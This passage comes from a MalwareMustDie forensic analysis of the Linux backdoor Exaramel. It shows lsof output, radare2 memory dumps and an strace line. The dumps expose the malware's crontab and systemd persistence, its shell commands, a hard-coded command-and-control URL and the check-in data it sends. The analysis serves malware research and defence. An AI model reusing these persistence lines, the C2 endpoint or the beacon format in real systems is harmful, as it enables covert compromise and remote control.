  546. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  547. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  548. Exaramel    4u  0000                0,9        0    1203 anon_inode
  549. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  550.  
  551. // Live radare2 forensics (before)
  552.  
  553. 0xc4200a6440 2304 /test/Exaramel]> pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
  554. - offset -     0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
  555. 0xc4200a6440  Access-Control-Allow-Origin.....Content-Disposition.............
  556. 0xc4200a6480  If-Unmodified-Since.............Proxy-Authenticate..............
  557. 0xc4200a64c0  Proxy-Authorization.............Strict-Transport-Security.......
  558. 0xc4200a6500  Transfer-Encoding...............config.json.....................
  559. 0xc4200a6540  ..m...............m...............m.....................`.. ....
  560. 0xc4200a6580  listen unix /tmp/.applock.......bind: address already in use....
  561. 0xc4200a65c0  App has already started!.......................................
  562.  
  563. // Live radare2 forensics (after)
  564.    :
  565. 0xc42000ed90  Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
  566. 0xc42000ede8  ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
  567. 0xc42000ee40  201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
  568. 0xc42000ee98  0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
  569. 0xc42000eef0  $.m.............j6n.....&.........m..............!n..............bn.....4.........m.....
  570. 0xc42000ef48  ......../test/`........ E. ..../tmp/.applock............................................
  571. 0xc42000efa0  rH..*.E?.[......&.............../dev/urandom............@.. ............................
  572. 0xc42000eff8  ................................Hosts...................Proxy...................Version.
  573. 0xc42000f050  ................Guid....................Next....................Datetime................
  574. 0xc42000f0a8  Timeout.................Def.............................................................
  575.    :
  576. 0xc42000f408  /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
  577. 0xc42000f460  USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
  578. 0xc42000f4b8  ........`.......... ....`.......... ..../dev/null.......... ....... ....................
  579. 0xc42000f510  /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
  580. 0xc42000f568  _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
  581. 0xc42000f5c0  `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
  582. 0xc42000f618  ... ..../dev/null.......... ....... ............uname.................../bin/uname......
  583. 0xc42000f670  -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
  584. 0xc42000f6c8  st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
  585. 0xc42000f720  P.. ....I.........m...............m...........nyan_apt%0A...............................
  586.   :
  587. 0xc42004a36f  .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
  588. 0xc42004a4cf  ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
  589. 0xc42004a527   xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
  590. 0xc42004c660  (crontab -l 2>/dev/null) | grep //test/Exaramel && echo 'true' || echo 'false'.........
  591.   :
  592. 0xc420053148  ........................................................................................
  593. 0xc4200531a0  /etc/systemd/system/syslogd.service.....................................................
  594. 0xc4200531f8  ........................................................................................
  595.   :
  596. 0xc4200533d3  ........................................................................................
  597. 0xc42005342b  .....................https://176.31.225.204/api/v1/auth/app.............................
  598. 0xc420053483   .............................q`........ ...............................................
  599.   :
  600. 0xc4200551e0  generation=1&guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&platform=Linux+xxxxxxxxxxxxxxxxx
  601. 0xc420055238  xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&version=1&whoami=nyan_apt%0A.....
  602.  
  603. // crontab tampering artifact (syslog entry emitted by crontab via /dev/log):
  604.  
  605. munmap(0x7f75952fb000, 4096)      = 0
  606. socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
  607. connect(3, {sa_family=AF_FILE, path="/dev/log"}, 110) = 0
  608. sendto(3, "<78>Jan 10 07:55:51 crontab[2547]: (test) LIST (test)", 53, MSG_NOSIGNAL, NULL, 0) = 53
  609.  
  610.  
  611. ---
  612. # MalwareMustDie! - Don't spread malware - spread LOVE! @unixfreaxjp